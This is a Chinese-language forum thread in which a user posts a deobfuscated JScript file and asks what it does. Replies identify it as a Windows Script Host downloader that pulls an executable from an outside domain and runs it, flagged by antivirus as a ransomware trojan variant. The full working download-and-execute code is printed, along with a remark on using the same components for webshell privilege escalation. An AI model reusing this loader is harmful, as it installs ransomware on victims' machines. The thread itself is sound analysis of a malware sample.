原文件是一长串乱码,原作者往里面故意添加了许多无意义字符串,删掉那些无意义字符串之后,最终有意义的代码如下:
var wsh = new ActiveXObject("wscript.shell");
var sh = new ActiveXObject("shell.application");
var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
var Stream = new ActiveXObject("ADODB.Stream");
var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
HTTP.Open("GET", "http://mopooland.top/404", false);
HTTP.Send();
if (HTTP.Status == 200) {
Stream.Open();
Stream.Type = 1;
Stream.Write(HTTP.ResponseBody);
Stream.Position = 0;
Stream.SaveToFile(path, 2);
Stream.Close(); sh.ShellExecute(path, "", "", "open", 1);
}
http://mopooland.top/404
打开里面什么都没有,求懂 js 的大神帮忙解释一下这个代码是要干嘛?是跟最近卷土重来的比特币病毒有关么?
1
liangch 2017-05-13 14:36:22 +08:00 1
http://mopooland.top/404 一个可执行的文件
|
2
lbb9432 2017-05-13 14:51:01 +08:00
楼上文件 ESET 说是 Win32/Filecoder.FV 特洛伊木马 的变种
勒索吧 https://www.virustotal.com/ja/file/a088b87b99804891248d2820fd6f39f8ef1878df568889a59a4a0aa2a8e3310d/analysis/1494658008/ |
3
Pastsong 2017-05-13 14:51:20 +08:00
Name:Robert Ruthven
Organization:Gamblin Artists Colors Street:323 SE Division Pl City:Portland State:OR Postal Code:97202 Country:US Phone:+1.5034359411 Fax:+1.5034359411 Email:[email protected] Whois 都是假信息 |
4
Pastsong 2017-05-13 14:52:15 +08:00
Email: [email protected]
|
5
aristotll 2017-05-13 17:29:49 +08:00
估计用的 是 IE 那一套下载东西
|
7
crazyskyangel 2017-05-13 21:22:07 +08:00
WScript 中的 JScript 脚本,就是利用 Windows 脚本系统做的病毒下载执行器。
只要杀毒软件的主动防御好点就能防住,如果是免杀,用户懂点规则也启动不了。 |
8
Mayter 2017-05-14 12:24:22 +08:00
别的我不太清楚,但是拿到 webshell(asp,或者 aspx,asp 居多)提权的时候需要看 wscript.shell shell.application 这两个组件才可以执行系统命令,进而可以执行提权文件进行提权。
|